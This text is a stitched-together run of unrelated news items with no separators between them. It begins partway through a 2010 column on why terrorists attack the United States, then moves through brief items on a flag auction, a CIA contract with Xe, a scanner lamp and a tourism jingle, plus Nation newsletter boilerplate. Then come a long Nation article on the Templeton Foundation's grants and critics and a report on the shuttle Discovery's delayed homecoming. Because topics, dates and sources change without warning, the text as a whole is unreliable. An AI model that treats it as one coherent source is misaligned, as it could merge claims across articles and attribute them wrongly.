And that is why they hate us – and why they come to kill us .
In a way this is a comforting thought , because it absolves us of the need to think .
For no patriotic American is going to demand we surrender our freedom to prevent fanatics from attacking us .
The Wall Street Journal ‘s Bret Stephens advances a parallel view .
We are hated , he says , because of our popular culture .
We are loathed in the Islamic world , Stephens writes , because of “ Lady Gaga – or , if you prefer , Madonna , Farrah Fawcett , Marilyn Monroe , Josephine Baker , or any other American woman who has … personified what the Egyptian Islamist writer Sayyid Qutb once called ‘ the American Temptress . ' ”
This hatred is at least 60 years old , says Stephens , for Qutb wrote even before “ Elvis , Playboy , the pill , women ’s lib , acid tabs , gay rights , Studio 54 , Jersey Shore , and … Lady Gaga . ”
Qutb ’s revulsion at American degeneracy is why his legion of Islamic followers hate us .
Again , a comforting thought .
For , if Lady Gaga is the problem , there is nothing we Americans can do about it .
Yet , this is as self - delusional as saying the FLN set off bombs in movie theaters and cafes in Algiers to kill the French because of what Brigitte Bardot was doing on screen in And God Created Woman .
American ’s toxic culture may be a reason devout Muslims detest us .
It is not why they come here to kill us .
Mohammed Atta ’s friends did not target Hollywood , but centers and symbols of U.S. military and political power .
U.S. Marines were not attacked by Hezbollah until we inserted those Marines into Lebanon ’s civil war .
No Iraqi committed an act of terror against us before we invaded Iraq .
And if the Sept. 11 killers were motivated by hatred of the immorality of our society , what were they doing getting lap dances in Delray Beach ?
Osama bin Laden declared war on us , first and foremost , to end the massive U.S. presence on sacred Saudi soil that is home to Mecca and Medina .
Some may insist this was not his real motive .
But , apparently , the Saudis believed him , for they quickly kicked us out of Prince Sultan Air Base .
As for the Taliban , they would surely make short work of Lady Gaga .
But their stated grievance is the same as Gen.
Washington ’s in our war with the British :
If you want this war to end , get out of our country .
By Occam ’s razor , the simplest explanation is usually the right one .
Looking at America ’s wars in Iraq , Afghanistan , and Pakistan , Maj .
Hasan , Abdulmutallab , and Shahzad decided that what we call the war on terror was in reality a war on Islam .
All decided to use their access to exact retribution for our killing of their fellow Muslims .
We are being attacked over here because we are over there .
Nor is it a good sign that U.S. intelligence is reporting that rising numbers of U.S. Muslims are making Internet inquiries about how and where to get training to bring the war home to America .
COPYRIGHT 2010 CREATORS.COM
The auction house has estimated it will fetch between $ 2 million and $ 5 million ( £ 1.3 million to £ 3.3 million ) but hopes it could even exceed the current auction record for a flag – the $ 12.3 million paid for an American flag captured by the British during a 1779 engagement during the War of Independence .
Click to email this to a friend ( Opens in new window )
The CIA has hired private security firm Xe Services , the company once known as Blackwater Worldwide , to guard its facilities across the globe , officials said .
An industry source said the contract , worth about $ 100 million , includes security services in Afghanistan and in “ multiple regions , ” The Washington Post reported Thursday .
The previously undisclosed contract came to light as members of a federal commission investigating war - zone contractors chastised the State Department for awarding Xe a $ 120 million contract to guard U.S. consulates under construction in Afghanistan , the Post said .
CIA spokesman Paul Gimigliano , while not confirming the contract , said Xe personnel would not be involved in operations .
“ While this agency does not , as a rule , comment on contractual relationships we may or may not have , we follow all applicable federal laws and regulations , ” Gimigliano said .
“ We have a very careful process when it comes to procurement , and we take it seriously .
We ’ve also made it clear that personnel from Xe do not serve with the CIA in any operational roles . ”
As Blackwater , the Moyock , N.C. , company has been under scrutiny since a September 2007 incident in Baghdad when its guards opened fire in a city square , allegedly killing 17 unarmed civilians and wounding 24 .
It has been fending off prosecution and lawsuits since .
“ Blackwater has undergone some serious changes , ” a U.S. official familiar with the deal told the Post .
“ They ’ve had to prove to the government that they ’re a responsible outfit .
Having satisfied every legal requirement , they have the right to compete for contracts . ”
Source : UPI
Not all scanners are created equal , and this is something that one ought to take into consideration before making a purchase , especially when it is going to cost you a bomb – relatively speaking , at least where scanner prices are concerned , that is .
Now here is a non-traditional scanner form factor – the $ 251 SnapLite Desk Lamp iPhone 5 Scanner .
It looks like a regular desk lamp that you would see in any normal office or study , but when the situation calls for it , this bad boy is capable of handling scans of up to A4 sizes .
Just how does the SnapLite Desk Lamp iPhone 5 Scanner work ?
Well , transforming it from a regular workstation light or lap is a snap , where all that you need to do is to slide your handset onto the top and you ’re good to go .
This particular stand has been perfectly designed for your iPhone 5 , iPhone 5s and iPhone 5 c , where it will make sure your smartphone ’s camera ends up as a scanner , handling a range of objects and documents up to A4 size .
Not only that , you will be able to choose from a bunch of other functions and timer options , making this the ideal accessory to use at home or at the office .
With its laser guide , you will gain superior scanning ability on the move , while one can also make adjustments to the lighting and brightness levels in double quick time .
You do n't need Mickey Mouse ears to hear the similarities .
Tourism Australia 's latest ad jingle is close enough to Disney 's Mickey Mouse Club theme tune that it could struggle to defend a legal challenge , a music expert says .
In the wake of the Federal Court 's ruling in February that Men At Work pay for ripping off parts of their pub classic Down Under from Kookaburra Sits In The Old Gum Tree , Queensland Conservatorium of Music popular music program convenor Donna Weston said the chord progression in Tourism Australia 's jingle was about " 80 per cent the same " as the Mickey Mouse theme song .
" The ' dada dada ' is almost exact - same chords and very similar melody , " Ms Weston said .
Ready to fight back ?
Sign up for Take Action Now and get three actions in your inbox every week .
You will receive occasional promotional offers for programs that support The Nation ’s journalism .
You can read our Privacy Policy here .
Sign up for Take Action Now and get three actions in your inbox every week .
Thank you for signing up .
For more from The Nation , check out our latest issue
Subscribe now for as little as $ 2 a month !
Support Progressive Journalism
The Nation is reader supported : Chip in $ 10 or more to help us continue to write about the issues that matter .
The Nation is reader supported : Chip in $ 10 or more to help us continue to write about the issues that matter .
Fight Back !
Sign up for Take Action Now and we ’ll send you three meaningful actions you can take each week .
You will receive occasional promotional offers for programs that support The Nation ’s journalism .
You can read our Privacy Policy here .
Sign up for Take Action Now and we ’ll send you three meaningful actions you can take each week .
Thank you for signing up .
For more from The Nation , check out our latest issue
Travel With The Nation
Be the first to hear about Nation Travels destinations , and explore the world with kindred spirits .
Be the first to hear about Nation Travels destinations , and explore the world with kindred spirits .
Sign up for our Wine Club today .
Did you know you can support The Nation by drinking wine ?
Research support for this article was provided by the Investigative Fund at The Nation Institute .
Ad Policy
For decades , sociologist Margaret Poloma struggled against the tone - deafness to spirituality that rules her discipline ; she wanted to study prayer , to measure divine love , to " see God as an actor . "
In the meantime , having held a tenured post at the University of Akron since 1970 , she built a respectable career with a long list of journal articles and books to her name .
She became an authority on Pentecostalism and on the family lives of modern women .
But all along , Poloma says , " I felt like I was swimming alone upstream . "
That changed in the early 1990s , when she found an ally in David Larson , a psychiatrist who longed to integrate religion into the practice of medicine .
He was in the process of founding the National Institute for Healthcare Research ( NIHR ) ; what the National Institutes of Health ( NIH ) is to medicine writ large , the NIHR would be for " the forgotten factor " of faith .
In 1995 Larson brought Poloma to a conference organized by his funder : the John Templeton Foundation , established by the eponymous investor who died in July 2008 at 95 .
" That conference was a magical experience for me , " Poloma remembers .
It was there that she met Stephen Post , a bioethicist who would later create the Institute for Research on Unlimited Love with Templeton money .
With Post she began receiving grants from the foundation .
By 2007 she was co-director of the Flame of Love Project , administering $ 2.3 million from Templeton to establish " a new interdisciplinary science of Godly Love , " with a focus on the Pentecostal tradition .
Other scholars are n’t quite sure what the " science of Godly Love " means , exactly .
Anthea Butler , a historian of Pentecostalism at the University of Pennsylvania , remembers that when Poloma ’s Flame of Love request for proposals appeared , " nobody in the field could figure out what the hell she was talking about . "
Many applied anyway .
" She went from being an outsider to someone with tons of money who can set the terms of discussion , " says Butler .
" This grant is something I would never have dreamed of , " Poloma told me .
" I feel like I ’m soaring like an eagle . "
For her , all gratitude is due to the funder .
" Where but Templeton would you find that kind of dialogue going on ? "
Nowhere — and that ’s what has some people so concerned .
The kind of research Poloma and her colleagues propose , however empirical and peer - reviewed , seems to come as an affront to centuries of purported progress in disentangling natural science from supernatural belief .
Depending on whom you ask , Templeton represents either the hijacking of nothing less than the meaning of life , or the restoration of its luster , which has been dulled by politics and cynicism .
Poloma ’s story repeats itself throughout the cluster of academic fields that the Templeton Foundation has chosen to flush with money .
This past January $ 4.4 million went to a project on free will , headed by philosopher Alfred Mele at Florida State University .
In a particularly arresting case , between 2006 and 2009 MIT physicist Max Tegmark received $ 8.8 million to set up the Foundational Questions Institute ( with the dashing acronym FQXi ) , which funds first - rate scientists to explore basic problems about time , space and the origin of the universe .
Its conferences have been " a coming - out - of - the - closet experience , " says Tegmark .
" Lots of people reconnect with the real reasons they started doing science in the first place . "
Templeton has a history of seeding fields of study almost from scratch .
After the foundation ’s initiative for research on forgiveness began in 1997 , the number of psychology journal articles on the subject went from fewer than fifty per year to more than 100 in 2000 and nearly 250 in 2008 .
When Templeton first financed Larson ’s NIHR in the early 1990s , the number of medical schools with courses on religion could be counted on one latex glove .
Now , according to Dr. Christina Puchalski of the Templeton - funded George Washington Institute for Spirituality and Health , three - quarters of US medical schools have brought spirituality into their curriculums .
What connects , say , unlimited love with string theory ?
According to the foundation , they are among life ’s " Big Questions , " the exploration of which constitutes its mission .
Templeton money supports other causes , like promoting virtue , encouraging gifted youth and fostering free enterprise , but its core concerns are more cosmic : " Does the universe have a purpose ? "
" Does science make belief in God obsolete ? "
" Does evolution explain human nature ? "
As the advance of knowledge becomes ever more specialized and remote , these questions seem as refreshing as they are intractable ; the foundation wants them to be our culture ’s uniting , overriding focus .
For those who work on matters of spirituality and science today , Templeton is around every turn , active in disciplines from biology and cosmology to philosophy and theology .
Many leading scholars speak of it with a tone of caution ; some who have not applied for grants expect to do so in the future , while a few have taken a principled stand against doing so .
Like debates about religion broadly , debates about Templeton often get mapped onto the culture wars in black and white , or red and blue .
It does n’t help that the foundation is a longstanding donor to conservative think tanks like the Heritage Foundation and the Cato Institute .
And while its founder preferred eternal questions to worldly politics , the son who has succeeded him , John Templeton Jr. — Jack — is a conservative Evangelical who spends his personal time and money opposing gay marriage and defending the Iraq War .
Since his father ’s death , concerns have swirled among the foundation ’s grantees and critics alike that Jack Templeton will steer the foundation even further rightward and , perhaps , even further from respectable science .
The stakes are high .
The Templeton Foundation holds assets valued at around $ 1 billion , a sum that will likely swell to $ 2.5 billion in the years to come as John Templeton Sr. ’s estate is settled .
That would put it squarely among the richest twenty - five foundations in the country , somewhere between the Rockefeller Foundation and the Open Society Institute .
The foundation dispenses about $ 70 million in grants annually , the bulk of which goes to programs in the religion - and - science orbit , from an eight - year , $ 9.8 million grant to Duke University ’s Center for Spirituality , Theology and Health to $ 25,000 for a 2007 conference on Carl Linnaeus and religion in Sweden .
For the often - fledgling , cash - strapped areas it funds , nothing else can compete .
But what makes the foundation more influential than its deep pockets is the combination of elite research and broad dissemination .
As a memo signed by John Templeton in 1995 put it , " The main purpose of the John Templeton Foundation is to encourage the top 1/10 of 1 % of people and thereby encourage all people to think that progress in spiritual information is possible , desirable , can be done and will be done . "
The " top 1/10 of 1 % " part happens in projects like the Humble Approach Initiative , a series of high - level interdisciplinary seminars that since 1998 have covered topics such as " Universe or Multiverse ? " and " Faith , Rationality , and the Passions . "
At each step , the foundation tries to keep a wider audience abreast .
Along with advanced research , it funds public essay contests and lectures .
A series of periodicals , including In Character and Science & Spirit , have tried to build readerships around Templeton ’s favorite topics — the former was even , for a time , sent to every member of Congress .
The foundation supports the annual World Science Festival in New York and takes out lavish ads in magazines and newspapers to showcase handpicked intellectuals answering Big Questions about God , science and markets .
The founder ’s flagship program , though , is the Templeton Prize , usually handed out each year by Prince Philip at Buckingham Palace .
The first went to Mother Teresa in 1973 ; this year ’s laureate is biologist and former Catholic priest Francisco Ayala .
Winners have run the gamut from Aleksandr Solzhenitsyn to physicist Freeman Dyson .
The award ’s value is consciously pegged to be bigger than that of the Nobel Prize .
The zoologist and author Richard Dawkins quipped in his 2006 book The God Delusion that the Templeton Prize goes " usually to a scientist who is prepared to say something nice about religion . "
He and others among the so - called New Atheists have been the foundation ’s most strident critics lately ; they believe Templeton is corrupting science by trying to inject it with religious dogma and , in turn , misrepresent science to the public .
The advance of science steamrolls over religion , they say , and Templeton is deluding people into thinking otherwise .
These are no minor charges .
Recent years have witnessed political and religious campaigns to both undermine and co-opt scientific authority on matters ranging from climate change to sex education to evolution .
Organizations like Answers in Genesis , which advocates for young - earth creationism , and the Discovery Institute , which orchestrates the intelligent - design movement , have been trying to squeeze creationism into public school science classes .
Within this environment , Templeton has struggled to maintain a delicate balance between alarmed scientists on one side and its mission to bring religion into conversation with science on the other .
In the past the foundation has funded book projects related to intelligent design by theorists William Dembski and Guillermo Gonzalez , who were affiliated with the Discovery Institute when they received Templeton grant money .
By then , though , Templeton had already begun funding a program that opposes creationism at the American Association for the Advancement of Science .
" We do not believe that the science underpinning the intelligent - design movement is sound , " wrote one foundation official in a 2007 letter to the Los Angeles Times .
Templeton has since taken pains to promote evolutionary theory among Christians , such as through the BioLogos Foundation , which was headed by geneticist Francis Collins until President Obama appointed him director of NIH .
Still , Templeton continues to find itself in murky waters ; in May , for instance , it supported a conference celebrating the retirement of the eminent philosopher Alvin Plantinga , who also happens to have been a sometime ally of intelligent design .
Indeed , the larger the foundation becomes , the harder it is to pin down .
" They ’ve become fuzzier and fuzzier , " says California Institute of Technology astronomer Sean Carroll , one of Templeton ’s more outspoken critics .
Even Jeffrey Schloss , a Templeton trustee who is part of the new $ 10 million grant project on evolutionary biology based at Harvard , admits that without the foundation " there ’d be a bit less accommodationist fluff that proposes integration [ between religion and science ] at the expense of rigor . "
Nonreligious scientists who accept Templeton grants — like biologist David Sloan Wilson and psychologist Jonathan Haidt — insist that the money comes without strings attached .
" No coercion , no corruption , " Haidt says .
But Nobel Prize–winning chemist Harry Kroto wo n’t accept that .
" They are involved in an exercise that endangers the fundamental credibility of the scientific community , " he contends .
Kroto has taken to organized resistance ; in 2007 , when the Royal Society of London considered accepting Templeton money for one of its programs , he was among eleven fellows , five of them Nobel laureates , who successfully lobbied against the plan .
Since a Templeton lecture series in 2004 , the Royal Society has n’t worked with the foundation , though some fellows and its president , astrophysicist Martin Rees , have done so individually .
Now Dawkins and Kroto , with eight other advisory board members of Project Reason , founded by New Atheist author Sam Harris in 2007 to promote secularism , are at work on another offensive .
Project Reason hired British science journalist Sunny Bains to investigate Templeton and build a case against it .
Her unpublished findings include evidence of pervasive cronyism : more than half of the past dozen Templeton Prize winners were connected to the foundation before their win , and board members do well obtaining grant money and speaking gigs .
Bains also argues that the true atheistic tendencies of leading scientists were misrepresented in the foundation ’s Big Questions advertisements .
Templeton ’s mission , Bains concludes , is to promote religion , and its overtures to science are an insidious trick with the purpose of sneaking in God .
Though some critics refuse to go near anything associated with Templeton , others are forced by its ubiquity to make compromises .
Sean Carroll , for one , will work only on scientific projects funded by Templeton ( such as the FQXi ) that are n’t solely under the foundation ’s banner .
" It represents a serious ethical dilemma , " says A.C. Grayling , a British philosopher and former columnist for New Scientist magazine ; he accuses the foundation of " borrowing respectability from science for religion . "
These critiques have taken a toll on the Templeton brand .
" I do n’t think Templeton money is dishonorable , and I have taken it myself , " says Michael Ruse , a philosopher of science at Florida State University .
But Ruse expresses relief that his latest book was n’t funded by any Templeton grants .
" The whole business has become so politicized and open to attack by the New Atheists — they would claim that I am just a paid spokesman . "
In response to its critics , the foundation cites the careful peer review process its projects go through and the integrity of the leading institutions with which it partners .
" The goal is to insist that the scholarship that is done in theology and philosophy is scientifically informed , and that the research done on the scientific side is conceptually rigorous and clear , " explains Michael Murray , a Templeton Foundation vice president .
In many cases these protocols and elite affiliations are enough to persuade eminent scientists , like Rees and Carroll , to put aside their misgivings and participate in Templeton projects .
Still , few Templeton grantees are fully aware of the breadth of the foundation ’s activities , much less the quixotic vision of its founder , John Templeton — or , as friends of the foundation have called him since he was knighted by Queen Elizabeth II in 1987 , " Sir John . "
In the foundation ’s boardroom , no one can hide from Sir John ’s gaze .
His bust is mounted above the far end of a long meeting table , and his portrait hangs on a long wall .
The offices are in one of a cluster of new towers scattered among industrial relics and hillside homes in West Conshohocken , Pennsylvania , fourteen miles up the Schuylkill River from downtown Philadelphia .
There , away from the distractions of big-city political and intellectual life , John Templeton ’s legacy is meant to carry itself out , unadulterated .
As the foundation grew larger , it became increasingly concerned that it not stray from the mission he gave it .
By the time he died , an elaborate audit system had been put in place to ensure that his wishes would forever be its holy writ .
Templeton ’s own spirituality was eclectic .
Though a lifelong Presbyterian , he imbibed the wisdom of religions both Eastern and Western , ranging from his friend Norman Vincent Peale , the prophet of the organization man , to Ramakrishna .
Early on , his mother exposed him to the Unity School of Christianity , a turn - of - the - century movement that emphasized positive thinking and healing through prayer .
The Unity School considered itself progressive and even , loosely speaking , scientific : a practical application of Christianity to modern life .
Out of his humble origins in small - town Tennessee , Templeton built a career as one of the great architects of globalization — " the dean of global investing , " Forbes once dubbed him .
As he grew older , though , his wealth ever multiplying , Templeton began turning his attention away from business .
" All my life I was trying to help people get wealthy , and with a little success .
But I never noticed it made them any happier , " he told Charlie Rose in a 1997 interview .
" Real wealth is not in money ; it ’s in spiritual growth . "
When Templeton created his foundation in the mid-’80s , conventional wisdom still largely held that religion would retreat as science secularized the world .
But in Templeton ’s eyes , this made religion the perfect investment .
" To get a bargain price , " he would say , " you ’ve got to look for where the public is most frightened and pessimistic . "
Religion ’s potential value far exceeded the asking price ; a lot could be done with a little .
Templeton would rhapsodize about science ’s amazing progress in virtually every area of knowledge over the past century — except in spirituality , which he believed had remained stagnant .
" It is no small wonder , then , " Templeton wrote in his manifesto , The Humble Approach , " that some people believe religion is gradually becoming obsolete . "
The answer he envisioned was n’t simply a louder , timelier enunciation of familiar doctrines but a new posture he called " humility theology , " an outlook that emphasizes how little is known about the divine and how much believers need to question and test their beliefs , as scientists do .
Templeton thought that science could get religions out of their rut .
Through his mostly self - published writings , Templeton developed an idiosyncratic vocabulary , speaking of the search for " spiritual information " and of God as " Unlimited Creative Spirit . "
But many of Templeton ’s books are less properly theological than they are well - meaning self - help texts with a metaphysical bent .
Uneasy with conventional meanings for " God " and " religion , " he speculated in a 1990 document that " maybe God is providing new revelations in ways which go beyond any religion . "
Concerning atheism , Templeton seems to have thought that if religion were more sophisticated , the line between belief and unbelief might disappear .
He once mused , " Could even atheists , who deny the reality of a personal God , begin to worship fundamental reality or unlimited mind or unlimited love ? "
At worst , Templeton could be called heterodox and naïve ; at best , his was a mind more open than most , reflective of the most inventive and combinatorial strains of American religious thought , eager to radically reinterpret ancient wisdom and bring it up to speed with some version from the present .
In 1996 Charles Harper , a planetary scientist from Harvard and NASA with a graduate education in cosmology and theology from Oxford , joined the foundation as its executive director .
A forceful — and by many accounts difficult — personality with a visionary streak , Harper shaped John Templeton ’s dream into a package of programs that could begin to look credible to the scientific community .
A decade later , phrases that Templeton used , like " spiritual realities , " " progress in religion " and even the foundation ’s official motto , " How little we know , how eager to learn , " were hiding behind a more presentable formula : " Supporting science , investing in the Big Questions . "
By no means , though , was the spiritual sidelined under Harper ’s leadership .
" Rigorous , advanced research in science in certain areas , " he wrote me , " can be supported and engaged as a form of theologically - significant research adventure . "
Harper shared with his boss the hope of making questions of faith part of the scientific conversation , and for years they funded innovative ways of doing so .
But in May 2009 , less than a year after Templeton ’s death , Harper was fired .
Those at the foundation are reluctant to explain why ; Harvard astronomer and longtime advisory board member Owen Gingerich attributes it to " a difference of opinion about who could best understand Sir John ’s intentions " between Harper and Jack Templeton .
Above all , " there was a clash of personalities . "
Jack Templeton is little like his father .
While the elder Templeton ’s writings venture into the poetic and speculative , his son ’s read like a medical report .
Jack displays admirable filial loyalty , evident most of all in his decades - long leadership of the foundation under his father ’s guidance ; he has been president since it began , serving full time since he left a successful pediatric surgery practice in 1995 .
His memoir begins and ends with lessons his father taught him and is suffused by , as he put it , " a struggle to find acceptance and approval in my father ’s eyes . "
Only now , though , are we beginning to learn how that struggle will express itself in his father ’s absence .
With Harper gone , and his replacement yet to be announced , there is a vacuum at the top .
It is , says physicist and trustee Paul Davies , " an anxious time . "
What seems to have people there most on edge right now , though , is not so much science as politics .
In this respect too , the younger Templeton differs in kind from his father .
He has financed a right - wing organization of his own , Let Freedom Ring , which once promoted the " Templeton Curve , " a graph he designed to advocate privatizing Social Security .
Now Let Freedom Ring lends support to the Tea Party movement .
Jack Templeton ’s money has also gone to the Swift Boat Veterans for Truth and to ads by the neoconservative group Freedom ’s Watch .
In 2008 he and his wife gave more than $ 1 million to support California ’s Proposition 8 , which banned same - sex marriage .
According to his lifelong friend Jay Norwalk , Templeton " is exceedingly scrupulous about keeping his personal life separate from the foundation . "
By most accounts , this has been the case .
Physicist Karl Giberson , a self - described liberal who has been a close collaborator on various foundation projects , adds , " To me , Jack Templeton represents the way you want conservatives to be . "
( Jack Templeton declined requests for an interview , and the foundation ’s chief external affairs officer , Gary Rosen , a former editor at Commentary , instructed foundation leadership to conduct interviews with The Nation only in writing . )
" Conservative , " though , hardly encompasses what the Templeton Foundation is about .
The founder ’s relationship to the notion was especially paradoxical ; in The Humble Approach , Templeton writes , " Rarely does a conservative become a hero of history . "
Although Templeton could be nostalgic , harking back to time - tested values and homespun sayings , he wanted above all to move the world forward , not hold it back .
Yet he was , in political parlance , a conservative : a voting ( and donating ) small - government , probusiness Republican .
More George H.W. than Dubya , his values bear little resemblance to the sex - centered prohibitions of today ’s religious right .
His foundation ’s charter speaks instead of " love , " " forgiveness , " " generosity , " " creativity , " " thrift " and " awe . "
John Templeton once told Harper that he read only the news in the paper , never the editorials ; the fray of partisanship and policy did n’t interest him .
He wanted to keep his foundation away from party politics , just as he kept its offices away from downtown philanthropic circles .
He loved undertakings , like a mission to the moon or a mutual fund , that would unite people around a common transcendent purpose .
In the minds of some , he succeeded .
Conservative Christian columnist and blogger Rod Dreher , upon beginning his new job as the foundation ’s director of publications at the start of this year , had a revelation .
" I did n’t realize how burned out with and depressed by politics I had become , " he wrote me .
Working at the Templeton Foundation , he believes , gave him a chance to grow in a way that political editorializing would never allow .
" I ’ve become ever more convinced that the more important questions facing us are cultural , not political , " Dreher explains .
Templeton has long maintained relationships with a network of right - wing organizations that share its interest in open markets , entrepreneurship and philanthropy .
The Heritage Foundation , for instance , received more than $ 1 million between 2005 and 2008 , and the Cato Institute , more than $ 200,000 in the same period .
Templeton ’s charter stipulates that the chief executives of the Atlas Economic Research Foundation and the Acton Institute for the Study of Religion and Liberty are entitled to be members of the foundation , and both have received hundreds of thousands of dollars in Templeton grants in recent years .
Those organizations also receive contributions from Big Oil and take part in the campaign to distort the scientific consensus on global warming .
Exceptions to the rightward trend abound : psychologist and Templeton trustee David Myers penned What God Has Joined Together : The Christian Case for Gay Marriage ; just last year the foundation treated the Marxist literary theorist Terry Eagleton to a Templeton Book Forum event at the Harvard Club in New York — the list goes on .
Grants to conservative think tanks are a comparatively minor part of the foundation ’s overall giving , but they send a strong signal nonetheless .
" There is no getting around the fact , " declared a glowing 2007 National Review article , " that it [ Templeton ] has quickly become a major force in conservative philanthropy . "
This is even more the case today .
Jack Templeton announced , in the 2008 Capabilities Report , a " fresh endeavor " on free enterprise , the area of the foundation ’s work closest to his own predilections .
Mauro De Lorenzo , hired as a vice president to lead the initiative , still retains a post at the neoconservative American Enterprise Institute ( AEI ) , which Templeton has also funded .
When I asked him about the foundation ’s think tank portfolio , De Lorenzo said , " We would be delighted to fund work at so - called left - of - center think tanks , so long as it meets the donor intent . "
That they have n’t funded such organizations yet , he continued , is just a matter of " not knowing each other . "
There is another glaring omission in Templeton ’s funding record : the foundation has yet to break ground on one of the six principal causes that John Templeton stipulated — education about voluntary family planning .
Gary Rosen explains that this program " is still in development " though it has been in the charter for more than a decade .
It is also an area where the foundation ’s mission could come into tension with its political and religious allies .
Treading carefully over such theologically fraught ground is a practice that goes back to the founder .
His writings might have been iconoclastic , but his deeds were mainly establishmentarian , keeping him in good standing with the religious powers that be .
Templeton money has supported a wide range of pious causes , from the American Bible Society to awards for " wholesome " filmmaking ( including , controversially , The Passion of the Christ ) .
Templeton Prizes have gone to evangelists Billy Graham and Bill Bright , as well as Watergate conspirator turned Evangelical activist Charles Colson and AEI theologian Michael Novak .
John Templeton built a place where the right ’s hardened partisans , like Dreher and Rosen , can settle down and turn to life ’s real Big Questions , in peace , for all mankind .
But the foundation meanwhile has associated itself with political and religious forces that cause it to be perceived as threatening the integrity of science and protecting the religious status quo .
This is quite the reverse of the founder ’s most alluring hope : a spirituality finally worthy of our scientific achievements .
As a result of such alliances , though , the foundation is also better positioned than most to foster a conservatism — and a culture generally — that holds the old habits of religions and business responsible to good evidence , while helping scientists better speak to people ’s deepest concerns .
On issues that range from climatology to stem cells , science has too often taken a back seat to the whims of politics , and Templeton ’s peculiar vision offers a welcome antidote to that .
To live up to this calling , Big Questions are one thing ; but the foundation will have to stand up for tough answers , too , as it did when announcing the findings of a major study that intercessory prayer does n’t improve medical outcomes , or when rebuking intelligent design .
John Templeton did want to hijack the meaning of life ; he meant to remake the human race ’s moral and cosmic toolbox in some scientific revolution of the spirit .
His money has given new life to ancient questions that matter to all of us .
But there is also an inescapable curiosity — or for some , like Margaret Poloma , good luck — in the idea that how we think about the most lofty things has become so much at the mercy of an eccentric investor ’s later - life dreams .
Discovery 's homecoming has been delayed yet again
The orbiter is riding piggyback on a modified jumbo jet , more than a week after it landed in the Mojave desert .
The pair arrived in Louisana on Friday for an overnight stop , but bad weather has delayed departure until Sunday .
The 3,591 km ( 2,232 mile ) trip is expected to cost the US space agency a hefty $ 1 m ( £ 560,000 ) .
Discovery and its seven member crew touched down on 9 August at the Edwards Air Force Base after a 14 - day mission to service the International Space Station .
Nasa diverted the landing to California after poor weather prevented the shuttle from returning to Florida .
After landing , Discovery underwent maintenance and crews worked around the clock to prepare the shuttle for departure by purging it of hazardous substances and removing fuel from the on - board tanks .
Technicians attached an aluminium tail cone to the shuttle to reduce drag during the flight , and coupled Discovery to the 747 jet just hours before takeoff .
Uncertain homecoming
Discovery 's homecoming has been tempered by uncertainties about the future of the shuttle programme .
DISCOVERY FLIGHT TIMELINE 26 July : Lift - off 30 July : First spacewalk to check repair techniques 1 August : Second spacewalk to fix faulty gear 3 August : Makeshift repairs completed 9 August : Touch - down
In pictures : Ride home
The fleet was grounded after a large piece of foam was shed from Discovery 's external fuel tank during lift - off on 26 July .
A similar problem caused the shuttle Columbia to break up on re-entry to the atmosphere in 2003 , killing all seven astronauts on board .
" From an overall standpoint we think really 4 March is the time frame we are looking at , " said Bill Gerstenmaier , Nasa 's new head of space operations and the official overseeing the foam fix .
" The teams are making very good progress .
But we are still not complete by any stretch of the imagination . "
Nasa chief Michael Griffin told journalists in Washington that there had been complacency in the past but that there was now a new culture at Nasa .
Technicians attached an aluminium tail cone to the shuttle to reduce drag
Space shuttle Atlantis had been due to blast off in September .
But Nasa engineers will now have to make modifications to the shuttle 's external fuel tank , particularly to an area known as the Protuberance Air Load ( Pal ) ramp .
Minority report
Seven members of an oversight panel said Nasa had not learned key lessons from the Columbia disaster .
Their " minority report " was contained within the final report by the 26 - member Return to Flight task group appointed to evaluate how the US space agency meets the recommendations by the Columbia Accident Investigation Board ( Caib ) .
So much emphasis was placed on trying to meet unrealistic launch dates that some safety improvements were skipped , said the seven members .
" We expected that Nasa leadership would set high standards for post - Columbia work ... we were , overall , disappointed , " the panellists wrote in the report .
The seven critics included a former shuttle astronaut , former undersecretary of the Navy , a former congressional budget office director , former moon rocket engineer , a retired nuclear engineer and two university professors .
Dr Griffin said he was " changing the game " on thinking regarding the shuttle 's usage by Nasa ahead of its September 2010 retirement .
It was originally calculated that about 28 further shuttle flights would be needed to complete the International Space Station .
That prediction was later reduced to about 15 .
Now , Dr Griffin said , Nasa was " not trying to get a specific number of flights out of the shuttle system " .
He added : " The United States has a commitment to its partners to complete the station .
We believe that , absent of major problems , we ... can essentially complete assembly of the station with the shuttle fleet in the time that we have remaining . "
